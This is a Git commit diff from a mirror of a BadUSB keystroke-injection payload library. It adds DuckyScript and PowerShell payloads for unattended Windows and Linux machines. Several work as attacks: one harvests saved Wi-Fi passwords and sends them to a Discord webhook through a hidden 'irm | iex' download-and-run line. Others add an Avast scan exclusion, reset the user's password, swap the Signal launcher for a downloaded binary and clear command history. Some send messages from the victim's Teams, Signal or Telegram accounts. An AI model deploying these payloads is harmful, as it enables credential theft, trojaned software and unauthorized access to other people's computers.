hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/133/head
0iphor13 2023-06-27 10:02:27 +02:00 committed by GitHub
parent 832876f6a1 0d27c643be
commit 2ea889eb6a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
121 changed files with 4155 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
payloads/library/credentials/WLAN-Windows-Passwords/README.md Normal file
View File

@ -0,0 +1,26 @@
# WLAN Windows Password - BADUSB ✅
A script used to stole target WLAN Passwords.
**Category**: WLAN, Credentials
## Description
A script used to stole target WLAN Passwords.
Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke 2 netsh commands
* Invoke-WebRequest will be entered in the Run Box to send the content

16
payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1 Normal file
View File

@ -0,0 +1,16 @@
# ENG
netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
$wlan = $_.Matches.Value
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
$Body = @{
'username' = $env:username + " | " + [string]$wlan
'content' = [string]$passw
}
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)
}
# Clear the PowerShell command history
Clear-History

25
payloads/library/credentials/WLAN-Windows-Passwords/payload.txt Normal file
View File

@ -0,0 +1,25 @@
REM ###################################################################
REM # |
REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration |
REM # Author : Aleff |
REM # Description: A script used to stole target WLAN Passwords. |
REM # Category : Credentials |
REM # Target : Windows 10-11 |
REM # Version : 1.0 |
REM # |
REM ###################################################################
DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE DISCORD example.com
STRING DISCORD
REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
DEFINE PAYLOAD example.com
STRINGLN ';irm PAYLOAD | iex

24
payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/README.md Normal file
View File

@ -0,0 +1,24 @@
# Add An Excepiton To Avast Antivirus
This script can be used to put an arbitrary exception path in the Avast app.
**Category**: Execute
## Description
This script can be used to put an arbitrary exception path in the Avast app.
The script open the Avast app, then go to menu, then go to, avast settings, then go to exception menu, then click the add exception button, then write the full-path defined before and save it, then close the app.
Choosing a specific file, folder, or website will exclude it from all Avast shields and scans, so be very careful when using this payload because it can concretely cause damage to your machine.
- You must edit the FULL-PATH with the path that you want to set as exception in the payload.txt file
```DuckyScript
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
```
### Dependencies
* The target must have **Avast installed** and **configured** on the machine

50
payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt Normal file
View File

@ -0,0 +1,50 @@
REM ########################################################
REM # |
REM # Title : Add An Exception To Avast Antivirus |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################
REM Requirements:
REM - Avast installed and configured
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
DEFAULT_DELAY 500
REM Open Avast application
DELAY 2000
GUI
STRINGLN avast
REM Go to Avast menu
DELAY 1000
REPEAT 3 TAB
ENTER
REM Go to Avast settings
DELAY 1000
REPEAT 4 TAB
ENTER
REM Go to Exceptions menu
DELAY 1000
REPEAT 12 TAB
ENTER
REM Add Exception button
TAB
ENTER
REM Write the full-path and then close the Avast app
DELAY 1000
TAB
STRING FULL-PATH
TAB
ENTER
ALT F4

57
payloads/library/execution/ChangeGitRemoteLink/README.md Normal file
View File

@ -0,0 +1,57 @@
# Change Remote Git Link
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
**Category**: Execution
## Description
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
This script turns out to be very useful for aviting data leaks between old cloned repositories and new online repositories.
To make it easier to use below you can find the various tested configurations, at the moment it is not available for macOS because since I do not have one it cannot be tested and therefore I cannot give the certainty that it works, however I hope that in the Hak5 community there may be someone who can contribute to this payload by completing it with this missing part.
## Payload.txt config - Windows 10/11 - Tested on Windows 11
```DuckyScript
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
```
## Payload.txt config - Linux (Debian based) - Tested on Ubuntu 23.04
```DuckyScript
DELAY 1000
CTRL-ALT t
DELAY 2000
```
## Dependencies
* Internet Connection
* git installed
* Full path of the cloned repository
* ExecutionPolicy Bypass
## Settings
- Full path of the local repository i.e. "C:\Users\User\Documents\Repository1"
```DuckyScript
DEFINE #FULL-PATH example
```
- Link from which updates are to be downloaded so the new repository the Repository2
```DuckyScript
DEFINE #NEW-GIT-LINK example.git
```
- REM Define the branch of the new repository Repository2, i.e. "main"
```DuckyScript
DEFINE #BRANCH example
```

42
payloads/library/execution/ChangeGitRemoteLink/payload.txt Normal file
View File

@ -0,0 +1,42 @@
REM ###########################################
REM # |
REM # Title : Change Remote Git Link |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11/Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Internet Connection
REM - git installed
REM - Full path of the cloned repository
REM - ExecutionPolicy Bypass if runned on Windows
REM Full path of the local repository i.e. "C:\Users\User\Documents\Repository1"
DEFINE #FULL-PATH example
REM Link from which updates are to be downloaded so the new repository the Repository2
DEFINE #NEW-GIT-LINK example.git
REM Define the branch of the new repository Repository2, i.e. "main"
DEFINE #BRANCH example
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN cd #FULL-PATH
DELAY 1000
STRINGLN git remote set-url origin #NEW-GIT-LINK
DELAY 1000
STRINGLN git pull --force origin #BRANCH
DELAY 1000
STRINGLN git reset --hard origin/#BRANCH
DELAY 1000
ALT F4

28
payloads/library/execution/ChangeMacAddress_Linux/README.md Normal file
View File

@ -0,0 +1,28 @@
# Change MAC Address
A script used to change the MAC address on a Linux machine.
**Category**: Execution
## Description
A script used to change the MAC address on a Linux machine.
Opens a shell, get the network card name, set the new MAC address, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the new MAC address

45
payloads/library/execution/ChangeMacAddress_Linux/payload.txt Normal file
View File

@ -0,0 +1,45 @@
REM ###########################################
REM # |
REM # Title : Change Linux MAC Address |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Permissions
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM Set here your preferred MAC, you can don't change it remaining with the default value
DEFINE NEW_MAC FF:FF:FF:FF:FF:FF
DEFAULT_DELAY 500
CTRL ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRINGLN sudo su
DELAY 1000
STRINGLN SUDO_PASS
DELAY 1000
REM #### MAC SECTION ####
REM net-tools command
STRINGLN apt install net-tools
DELAY 2000
REM Get the net interface name
STRINGLN INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
STRINGLN ifconfig $INTERFACE down
STRINGLN ifconfig $INTERFACE hw ether NEW_MAC
STRINGLN ifconfig $INTERFACE up
REM #### REMOVE TRACES ####
DELAY 2000
STRINGLN history -c
REM Close shell
STRINGLN exit

27
payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md Normal file
View File

@ -0,0 +1,27 @@
# Change Network Configuration
A script used to change the network configuration on a Linux machine.
**Category**: Execution
## Description
A script used to change the network configuration on a Linux machine.
Opens a shel, get the network card name, set the network configuration, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the network configuration

59
payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt Normal file
View File

@ -0,0 +1,59 @@
REM ###############################################
REM # |
REM # Title : Change Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###############################################
REM Requirements:
REM - Permissions
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
DEFINE #IPADDRESS 192.168.1.100
DEFINE #SUBNETMASK 255.255.255.0
DEFINE #GATEWAY 192.168.1.1
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRINGLN sudo su
DELAY 1000
STRINGLN SUDO_PASS
DELAY 1000
REM #### IP SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set network interface
STRINGLN IP="#IPADDRESS"
DELAY 500
STRINGLN MASK="#SUBNETMASK"
DELAY 500
STRINGLN GATEWAY="#GATEWAY"
DELAY 500
REM Get the net interface name
STRINGLN INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
DELAY 500
STRINGLN ifconfig $INTERFACE $IP netmask $MASK up
DELAY 500
REM #### REMOVE TRACES ####
STRINGLN history -c
DELAY 500
REM Close shell
STRINGLN exit

21
payloads/library/execution/Change_Windows_User_Name/README.md Normal file
View File

@ -0,0 +1,21 @@
# Change Windows User Name
This script can be used to change the windows user name.
**Category**: Execution
## Description
This script can be used to change the windows user name.
The script opens the research app and go to User Accounts settings using the default path `Control Panel\All Control Panel Items\User Accounts`, then go to "Change your account name" option and set the new name, save it and close the app.
It is absurd that you can do so many things on windows without asking for permissions.
### Dependencies
* Set the new name that you want to set
```DuckyScript
DEFINE NEW_NAME example
```

41
payloads/library/execution/Change_Windows_User_Name/payload.txt Normal file
View File

@ -0,0 +1,41 @@
REM #############################################
REM # |
REM # Title : Change Windows User Name |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM #############################################
REM Requirements:
REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set
DEFINE NEW_NAME example
DEFAULT_DELAY 500
REM Open Windows research
GUI
DELAY 1000
REM Search and opern explorer app
STRINGLN explorer
REM Goto search bar and open User Accounts settings
REPEAT 3 TAB
ENTER
STRINGLN Control Panel\All Control Panel Items\User Accounts
DELAY 1500
REM Goto "Change you account name"
TAB
ENTER
STRING NEW_NAME
TAB
ENTER
ALT F4

28
payloads/library/execution/Change_the_password_of_the_windows_user/README.md Normal file
View File

@ -0,0 +1,28 @@
# Change the password of the windows user
Through this script you will be able to change windows user's password super fast.
**Category**: Execution
## Description
Through this script you will be able to change windows user's password super fast.
A PowerShell with administrator permissions is started, and through the use of the `net` command you can change the password without necessarily having to know the original password.
It is always very fascinating to see how many things you can do on Windows systems without needing to know the original password. As fascinating as it is disturbing.
## Dependencies
* Nothing (i know it's absurd)
## Example
- `STRINGLN Get-ExecutionPolicy -List`
![](docs/1.png)
- `STRINGLN Set-ExecutionPolicy Bypass`
![](docs/2.png)
- `STRINGLN Get-ExecutionPolicy -List`
![](docs/3.png)

32
payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt Normal file
View File

@ -0,0 +1,32 @@
REM ############################################################
REM # |
REM # Title : Change the password of the Windows user |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ############################################################
REM Requirements:
REM - Nothing (i know it's absurd)
REM You must define the new Windows user password
DEFINE NEW_PASSWORD example
DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFT_ARROW
DELAY 500
ENTER
DELAY 2000
STRING net user $env:USERNAME
STRING NEW_PASSWORD
ENTER
DELAY 1000
ALT F4

28
payloads/library/execution/CloseAllApplicationsInWindows/README.md Normal file
View File

@ -0,0 +1,28 @@
# Close All Applications - BADUSB ✅
A script used to close all target open applications.
🟢 **Plug-And-Play** 🟢
**Category**: Execution
## Description
A script used to close all target open applications.
Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
## Getting Started
### Dependencies
* Internet Connection
* Windows 10,11
### Executing program
* Plug in your device
### Settings
- No settings - Plug-And-Play

18
payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1 Normal file
View File

@ -0,0 +1,18 @@
# Download Python script
# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
$savePath = "$env:temp\script.py"
(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
# Execute Python script
& python $savePath
# Delete the downloaded script
Remove-Item $savePath
# Clear the download history from the system's web cache
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
# Clear the PowerShell command history
Clear-History

34
payloads/library/execution/CloseAllApplicationsInWindows/payload.txt Normal file
View File

@ -0,0 +1,34 @@
REM #####################################################
REM # |
REM # Title : Close All Applications |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################################
REM Plug-And-Play
REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHELL_CODE example.com
DELAY 2000
GUI x
DELAY 250
REPEAT 10 DOWNARROW
ENTER
DELAY 1000
REPEAT 2 TAB
ENTER
DELAY 2000
STRING irm POWERSHELL_CODE | iex
ENTER

12
payloads/library/execution/CloseAllApplicationsInWindows/script.py Normal file
View File

@ -0,0 +1,12 @@
try:
import psutil
except:
import os
os.system("pip install psutil")
import psutil
for process in psutil.process_iter():
try:
process.terminate()
except:
pass

36
payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md Normal file
View File

@ -0,0 +1,36 @@
# Edit The Default Real App With An Arbitrary
A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.
**Category**: Execution
## Description
A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.
The script will download the zip archive in wich you should have the modified application, then unzip the archive and remove the original zip, then replace the original desktop file with the one that is present on the archive.
## Getting Started
### Dependencies
* sudo permissions
* Internet Connection
* Original application installed
### Settings
- Set the link from which to download the zipper archive
```DuckyScript
DEFINE ARBITRARY_APP_LINK example
```
- You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal
```DuckyScript
DEFINE PATH_TO_DESKTOP_FILE example/path
```
- You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME example
```

10
payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]arbitrary_file.desktop Normal file
View File

@ -0,0 +1,10 @@
[Desktop Entry]
Name=Signal
Exec=~/.arbitrary/bin/signal-desktop --no-sandbox %U
Terminal=false
Type=Application
Icon=signal-desktop
StartupWMClass=Signal
Comment=Private messaging from your desktop
MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;
Categories=Network;InstantMessaging;Chat;

10
payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]original_desktop_file.desktop Normal file
View File

@ -0,0 +1,10 @@
[Desktop Entry]
Name=Signal
Exec=/opt/Signal/signal-desktop --no-sandbox %U
Terminal=false
Type=Application
Icon=signal-desktop
StartupWMClass=Signal
Comment=Private messaging from your desktop
MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;
Categories=Network;InstantMessaging;Chat;

62
payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt Normal file
View File

@ -0,0 +1,62 @@
REM ################################################################
REM # |
REM # Title : Edit The Default Real App With An Arbitrary |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM ################################################################
REM Requirements:
REM - sudo permissions
REM - Internet connection
REM - Executable app
REM - '.desktop' file
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
REM You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal
DEFINE PATH_TO_DESKTOP_FILE example/path
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000
STRING curl -o ./arbitrary.zip "
STRING ARBITRARY_APP_LINK
STRINGLN "
REM Depends*
DELAY 5000
STRINGLN unzip ./arbitrary.zip -d ./.arbitrary
REM Depends*
DELAY 2000
STRINGLN rm ./arbitrary.zip
DELAY 1000
STRING sudo mv ./.arbitrary/
STRING PATH_TO_DESKTOP_FILE
STRING /usr/share/applications/
STRING ORIGINAL_DESKTOP_FILE_NAME
ENTER
DELAY 1000
STRING SUDO
ENTER
DELAY 4000
ALT f4

32
payloads/library/execution/ExploitingAnExecutableFile/README.md Normal file
View File

@ -0,0 +1,32 @@
# Exploiting An Executable File - Linux ✅
Plug-And-Play ❤️
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
**Category**: Execution
## Description
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
**Remember that any execution that is not permitted is not legitimate**.
## Getting Started
### Dependencies
* Linux system
### Executing program
* Plug in your device
### Settings
* You can edit the content that you want to put into the executable file.
```Shell
# You can put whatever you want into the executable file
echo "/bin/sh" > "$file"
```

39
payloads/library/execution/ExploitingAnExecutableFile/payload.txt Normal file
View File

@ -0,0 +1,39 @@
REM ################################################
REM # |
REM # Title : Exploiting An Executable File |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Script ####
STRINGLN_BLOCK
function search_file {
for file in "$1"/*; do
if [[ -d "$file" ]]; then
search_file "$file";
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
echo "File Found: $file";
# You can put whatever you want into the executable file
# echo "/bin/sh" > "$file"
fi
done
}
USER=$(whoami);
# You can choose whatever folder you want, the script is recursive.
DIR=/home/$USER/Documents;
search_file "$DIR";
END_STRINGLN
ENTER

19
payloads/library/execution/ExploitingAnExecutableFile/script.sh Normal file
View File

@ -0,0 +1,19 @@
#!/bin/bash
function search_file {
for file in "$1"/*; do
if [[ -d "$file" ]]; then
search_file "$file"
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
echo "File Found: $file"
# You can put whatever you want into the executable file
# echo "/bin/sh" > "$file"
fi
done
}
USER=$(whoami)
# You can choose whatever folder you want, the script is recursive.
DIR=/home/$USER/Documents
search_file "$DIR"

BIN
payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/Make_Windows_performant_but_ugly_and_boring.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 6.3 MiB

19
payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/README.md Normal file
View File

@ -0,0 +1,19 @@
# Make Windows performant (but ugly and boring)
This script can be used to change some advanced Windows settings to make it as efficient as possible albeit losing some of the fluidity and beauty of the operating system.
This script is Plug-And-Play <3
**Category**: Execution
![](Make_Windows_performant_but_ugly_and_boring.gif)
## Description
This script can be used to change some advanced Windows settings to make it as efficient as possible albeit losing some of the fluidity and beauty of the operating system.
The script opens the Windows advanced settings via sysdm.cpl and accesses the advanced settings by changing the selected option for best performance and unchecking all possible features.
### Dependencies
* Nothing is needed, this script is Plug-And-Play <3

47
payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt Normal file
View File

@ -0,0 +1,47 @@
REM ##################################################################
REM # |
REM # Title : Make Windows performant (but ugly and boring) |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ##################################################################
REM Plug-And-Play <3
REM Requirements:
REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
DEFAULT_DELAY 500
GUI r
DELAY 2000
REM Open advanced settings
STRINGLN sysdm.cpl
DELAY 2000
REM Goto nav bar
REPEAT 5 TAB
REM Goto Advanced
REPEAT 2 RIGHTARROW
REM Open Settings
TAB
REM Invia il comando
ENTER
REM Adjust for best performance
REPEAT 2 DOWNARROW
REM Save it
REPEAT 4 TAB
DELAY 3000
REM Close the windows (not the os lol)
REPEAT 2 ALT F4

48
payloads/library/execution/SendEmailThroughThunderbird/README.md Normal file
View File

@ -0,0 +1,48 @@
# Send Email Through Thunderbird
This payload can be used to prank friends by sending emails at top speed from their thunderbird clients.
**Category**: Execution
## Description
This payload can be used to prank friends by sending emails at top speed from their thunderbird clients.
This payload opens a shell (or powershell if running on windows), starts the Thunderbird application, and via the CTRL N sequence starts the email sending functionality that is not protected by any security system. After that it writes the recipient's email, the subject of the email and the body of the message and sends.
## Getting Started
### Windows 11
```DuckyScript
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Start-Process "thunderbird.exe"
DELAY 4000
```
### Ubuntu 23.04
```DuckyScript
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN thunderbird
DELAY 4000
```
### Dependencies
* Internet Connection
* Thunderbird installed and email configured
* ExecutionPolicy Bypass (for Windows target)
### Settings
- Receiver email address
- Email Subject
- Email Message

52
payloads/library/execution/SendEmailThroughThunderbird/payload.txt Normal file
View File

@ -0,0 +1,52 @@
REM ########################################################
REM # |
REM # Title : Send Email Through Thunderbird |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 - Linux(debian tested) |
REM # |
REM ########################################################
REM Requirements:
REM - Internet Connection
REM - Thunderbird installed and email configured
REM - ExecutionPolicy Bypass (for Windows target)
REM This payload is tested on:
REM - Ubuntu 23.04
REM - Windows 11
REM REQUIRED - Set receiver email address
DEFINE EMAIL-ADDRESS example@change-it.org
REM REQUIRED - Set email Subject
DEFINE SUBJECT example
REM REQUIRED - Set email message
DEFINE MESSAGE example
DEFAULT_DELAY 1000
REM # PowerShell
GUI r
STRING powershell
ENTER
STRINGLN Start-Process "thunderbird.exe"
DELAY 4000
REM # Thunderbird
CTRL n
DELAY 2000
STRING EMAIL-ADDRESS
REPEAT 2 TAB
STRING SUBJECT
TAB
STRING MESSAGE
CTRL ENTER
DELAY 2000
ENTER
REM # End actions
ALT F4
ALT F4

24
payloads/library/execution/SendMessagesInTeams/README.md Normal file
View File

@ -0,0 +1,24 @@
# Send Messages In Teams
A script used to prank your friends sending a message through the user Teams.
**Category**: Prank
## Description
A script used to prank your friends sending a message through the user Teams.
Open a PowerShell, stop Teams if is runned, run Teams, run new message function, search the receiver, write and send some messages, then close the app.
## Getting Started
### Dependencies
* Internet Connection
* Microsoft Teams installed and user logged-in
* ExecutionPolicy Bypass
* Python
### Settings
- Setup the receiver

49
payloads/library/execution/SendMessagesInTeams/payload.txt Normal file
View File

@ -0,0 +1,49 @@
REM ###########################################
REM # |
REM # Title : Send Messages In Teams |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ###########################################
REM Requirements:
REM - Microsoft Teams installed and user logged-in
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM 1. Open a powershell
REM 2. Close if Teams is opens and reopen it
REM 3. Goto search bar
REM 4. Search the person by name, email, id or what you want...
REM 5. Downarrow and enter to open the chat
REM REQUIRED - Name, email, id or what you want for contact the target
DEFINE #USER example
REM REQUIRED - Messages
DEFINE #MESSAGE example
DEFAULT_DELAY 1000
GUI r
STRINGLN powershell
REM #### Powershell ####
STRINGLN Stop-Process -Name "Teams"
STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)"
REM It depends by the computer power
DELAY 10000
REM #### Teams ####
CTRL N
STRINGLN #USER
REPEAT 2 TAB
REM #### Messages ####
STRINGLN MESSAGE
ALT F4
ALT F4

40
payloads/library/execution/SendSignalMessages/payload.txt Normal file
View File

@ -0,0 +1,40 @@
REM #########################################
REM # |
REM # Title : Send Signal Messages |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank, Execution |
REM # Target : Windows 10-11 |
REM # |
REM #########################################
REM Requirements:
REM - Internet Connection
REM - Signal App installed
REM Payload Plug-And-Play but can be edited as you want the message
REM REQUIRED - Receiver number
DEFINE #NUMBER 3332211000
REM REQUIRED - Message to send
DEFINE #MESSAGE YOUR_MESSAGE
DEFAULT_DELAY 500
GUI r
STRINGLN powershell
STRINGLN Stop-Process -Name "Signal"
STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
DELAY 5000
REPEAT 3 TAB
ENTER
STRING #NUMBER
TAB
ENTER
REM This is the message that will be sent.
REM You can change it as you want, if you want.
STRINGLN #MESSAGE
REM Closing Signal App
ALT F4

27
payloads/library/execution/SendTelegramMessages_Linux/README.md Normal file
View File

@ -0,0 +1,27 @@
# Send Telegram Messages - Linux ✅
A script used to prank your friends sending messages by using Telegram app.
**Category**: Prank
## Description
A script used to prank your friends sending messages by using Telegram app.
Opens a shell, runs the telegram-desktop app, search the user by the id, enter into the chat, write the message(s) and send, then close the app and the shell.
## Getting Started
### Dependencies
* Internet Connection
* telegram-desktop installed and activated
### Executing program
* Plug in your device
### Settings
- Telegram username
- Messages

36
payloads/library/execution/SendTelegramMessages_Linux/payload.txt Normal file
View File

@ -0,0 +1,36 @@
REM #########################################
REM # |
REM # Title : Send Telegram Messages |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux |
REM # |
REM #########################################
REM Requirements:
REM - Internet Connection
REM - telegram-desktop installed and activated
DEFINE #USERNAME @example
DEFINE #MESSAGE example
DEFAULT_DELAY 500
CTRL ALT t
DELAY 2000
STRINGLN telegram-desktop
REM It depends by the computer...
DELAY 3000
REM Define the message receiver username
STRINGLN #USERNAME
REM Define the message(s)
STRINGLN #MESSAGE
REM other messages here...
REM Closing Telegram App and the Shell
ALT F4
CTRL c
ALT F4

31
payloads/library/execution/Send_Messages_In_Discord_Channel-Server/README.md Normal file
View File

@ -0,0 +1,31 @@
# Send Messages In Discord Channel-Server
This script can be used to send messages in a specific channel of a Discord text server.
**Category**: Execution
## Description
This script can be used to send messages in a specific channel of a Discord text server.
Open the GUI interface and trough this one open the Discord app, then use the keyboard shortcut CTRL-k to open the server chat.
**Note** that if you want to send a message within a chat that has a very common name such as #general then be aware that it is very likely that the chat of the server in which you want to send the message will not be selected but some other. If, on the other hand, you want to send it in a chat with a somewhat more specific name such as wifi-pineapple (Hak5's text channel) then almost certainly the channel in which you wish to send the message will be selected.
![](assets/1.png)
![](assets/2.png)
## Dependencies
* Discord Installed
* Internet connection
## Settings
- If, for example, the server is Hak5 and the channel in which you want to send the message is called wifi-pineapple then you should write just wifi-pineapple
`[18] DEFINE #CHAT_NAME example`
- This depends on the power of the computer and whether there are upgrades to be done
`[27] DELAY 6000`

BIN
payloads/library/execution/Send_Messages_In_Discord_Channel-Server/assets/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 49 KiB

BIN
payloads/library/execution/Send_Messages_In_Discord_Channel-Server/assets/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

41
payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt Normal file
View File

@ -0,0 +1,41 @@
REM ############################################################
REM # |
REM # Title : Send Messages In Discord Channel-Server |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ############################################################
REM Requirements:
REM - Internet connection
REM - Discord Installed
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called wifi-pineapple then you should write just wifi-pineapple
DEFINE CHAT_NAME example
REM Open Discord app
GUI
DELAY 1000
STRINGLN Discord
REM This depends on the power of the computer and whether there are upgrades to be done
DELAY 6000
REM Search by Discord keyboard shortcut and open it
CTRL k
DELAY 500
STRINGLN #CHAT_NAME
DELAY 500
STRINGLN_BLOCK
Write here..
your...
messages...
END_STRINGLN
ALT F4

18
payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/README.md Normal file
View File

@ -0,0 +1,18 @@
# Set An Arbitrary DNS (IPv4 version)
This script can be used to change the default DNS server in Windows 11.
**Category**: Execution
## Description
This script can be used to change the default DNS server in Windows 11.
The script open the settings, then go to network settings, then go to wi-fi settings, then go to hardware properties settings, the open the dns settings, then change to manual, then set the DNS server defined before, then save the settings changed and close the window.
- You must edit the DNS defining the IPv4 in the payload.txt file
```DuckyScript
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
```

60
payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt Normal file
View File

@ -0,0 +1,60 @@
REM ########################################################
REM # |
